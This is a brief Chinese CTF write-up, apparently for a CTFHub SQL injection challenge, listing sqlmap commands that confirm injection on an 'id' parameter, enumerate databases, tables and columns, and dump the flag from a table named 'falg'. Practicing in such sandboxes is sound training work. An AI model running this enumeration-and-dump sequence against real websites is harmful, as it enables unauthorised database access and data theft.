直接跑sqlmap
sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1
看到可注入
sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 --dbs
下意识选了sqli
sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables
发现flag
sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 -D sqli -T falg --columns
sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 -D sqli -T falg -C flag --dump
得到flag